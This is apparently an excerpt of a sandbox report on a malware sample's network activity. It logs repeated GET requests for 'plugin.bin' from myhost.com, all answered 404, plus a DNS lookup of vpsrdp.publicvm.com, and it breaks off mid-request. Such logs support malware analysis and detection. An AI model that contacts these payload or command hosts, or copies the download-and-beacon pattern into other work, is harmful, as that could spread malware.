      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:40 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2F%2BdZjd%2BNvHTZjmQLa%2BYELaU9dZOB%2FCYTKinMkTnF8Owg6y1kx%2BPY6VLSc0BcmMLBkdKeQ5ubwPeDejXOPEFl9WleCjOkzXBndnfKIm2VbncYb7ujvX2WYaclJD%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735daa0ca14149-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:41 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCKE6liZ%2B98EGcpLutGK1Epjpn1tUg8qne2%2BjnuKxNFZg1YCxwu5v1LaNDOlKOm%2B1s6wkNEw1AebeQk%2FNOsuP03j4whFKDtOo%2FazxkYgOGOXIuPyrH22BTtwF36%2F"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735db16cf7634d-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:42 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Cm7OZm32q3JQ1XFOScZiGbKIRFdcWm165snoNI0wr3DY1uAN%2FXN3LJqJ3mUO88b0cmDL4h1qljAPcvXgGVTCYPYgDRRS6kM2TKX0ZrUJd2MjuOgCFXNK4Lbm11k"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735db909d271de-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:43 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJVU9cgAsDoaUzgqIUX2XVIzR1BliVHQOAtOSQiScJg%2BXbofaJ2lcIg6%2FyCAKt8KEL2DhJNcZUaIEQR3ryaNjpGl8BTRQmEyb545tUr0q%2BaJyMRCbeRv3SSHi23B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dbe4aef63ad-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:43 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6vmQ8Q2l9YGmnmoyWEap1vaRiua0vRvQpDuSvegGW4DU8IA8C7jRr6NMSboFnl63lavjoE2VPztj2Nq4GcQQDzruk%2FfV4h6bVKPBPO9WcCgN%2BHmWv%2F%2FUWZcEoh3V"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dc3fafd891e-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:44 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGU0fmSc8zd5IC%2B5nn%2FrJKdthZjI39qNTT2Io98MlMxWF%2FEEr%2BzvmaEA8nBq4Gvi2DgrCH4fqsP4zJ9WZ0uomf7GBzSdnntuMawGeV3UuFx%2FNgi%2Bh0yZ0NtP%2Bhik"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dc93b7135da-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:45 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrSRiBdAIJ%2BD1I0LOhNkOyHgpQJpcTFy6PbTK2Qdz9vEdtfBlTJ51hqmCTwFOmf2Qv2SPpfwYindUMgU4fIQuUpMPyipajLbkjq87y1%2Fp7Psrb%2BnOI8mfg0MRlXy"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dcede749421-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:47 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9b9%2BDJ0bnYb2ggZs5ETu%2Fgdj8yYJacIrI%2FPT2SgYh05XCftzOZNoD7IjyvDWtVW6qyne7pYjEbhJNChuFsJ4GjsLgKoHltbw8wOivIdOrY6leKUxSDFrzCBnxZHX"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dd5c9ffdc45-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:47 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3llT69q7pENdCS7WIXIvaZOjHA0rwjg6ayPpdkIOkqtNUl1E9mdxcmXb9MseknHY4NWUA%2BqdKrc07f9kp4aTZRiWdiuSP1PafWYzGy4940YzI%2BrH%2FQPHLsllte4l"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735ddcdd82945a-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:48 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5V%2BEuxOlbjR%2BuKWsAAcDGtmICK7eOXnmuSa9lsazPwiGlh9pMcieziDTyLxmSaOaIIevTaDt1ETQKQ%2F9XCuXHptAqmLOeLzBfPIB5SIn0ln8xP84rUK98s%2F%2BeEYo"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735de22d3e94c7-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:49 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXEdg7WWCfjk83VxAbF7Ocvwb%2BzfJYX5Uh2fNPj%2Fd4ty9QwzCqUT7ZdLdjJ%2FWuU0c0d88ca4D9rfK5kvimKhE8eb35%2FRQ3Z%2By0gHzsUevJhh6BatXPMF90TzpkcU"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735de7b99271e4-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:51 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UZkKOG%2FKmG5y7OyvmmW2sOcSfOwO5MTH1gKZsRX0khjb0CNQ7iXXOLiTXQ25NcR8PgKVcd8HzCZoODeW%2BxbN35vg2zTR3BvD9AXyJqfKP5mXahT9Rm4N8Z%2FH8rWA"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735deecc44657b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:51 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI70kHmGXgxmmk10m2eBot33uvM0qN2oQlnVxGeoRiJryl7e1rfvucEZEKwH8FA0jpI7dbCSFW2wpcmGnfxKZjxyMHXaqnWod72O7eZ032oWjX6edBe6I7T5c%2BDg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735df5da017193-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:52 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYJICbBL82T6DPqtuvtoTkrmaMgpkGFKGHm0rq6rNVxUXs4vMuHPYIt%2Fi0du7NGOu2iddrBH0AizLrGLup39I3kqLP4SLp8VBKR4LybALDJLUdBzfndFhwdx2uAG"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735dfb4b337321-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      8.8.8.8:53
      Request
      vpsrdp.publicvm.com
      IN A
      Response
      vpsrdp.publicvm.com
      IN CNAME
      publicvm.com
      publicvm.com
      IN A
      139.99.66.103
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:04 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuzj1Q%2BtJh3P%2BMp57c5hvR7RIMY9NW6a3TutF%2Fc3BexEsPnX4Ng5ruMKF45q4lBUFrPPSxfIc0SeMkCUHw9nPB4T77P%2F4K%2Ff6k4DSuSOZYk00wzPsYEVzeZgr7QZ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e400d8f63b1-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:04 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHIu8R%2F%2BOv1%2Byanur%2Bm%2BqymtznV%2FVGoVixpvHpXQaffBsDt8BgDsomnt9mz4EPuv%2FIfp7%2FcEtamfbL8JWXyE6XJKhpGYCLO0kLSD%2Ft%2BJ%2FS%2BrLPeVUC5YmN9M%2FFE9"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e473c59637f-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:05 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6PcG3xnJTlm2cD1pgXsIwdh4evh%2F76RWhb6ERfHK8TyuRADQMv%2FBcDNweWRnZjsjMGmN4yg8eKLqx5Lr45Jc3N6Yh%2BkF%2F7jKLuQlMJy7nxOXCMamWxGM0NeQ8v9"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e4cdc2463cd-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:06 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLN%2Bu4onwshFhlOuwEgzXUHRvnbJzwNJIVLV0QS3w5IlGa%2FXdE%2FUQlIYK0p%2Fspb%2BBX2daN7igQ1yK0bisaKqeBMAVDZ5cA2l0AHwAt8fRg0BKfDAMKAJ6i54i%2Fc8"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e5238ac94a8-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:07 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBSH85SaEfeoQ4IZyeS5zX2He8xVOvrEdYxdECj7wwQwK4TvJSYE0ind%2Fq5t67Ti8ht1SJUj3u5bJOaNlnuwfkTsiif6o6Po1xdlo2jdS4b%2FKISSX8cd9%2FkdHLFV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e591c81942b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
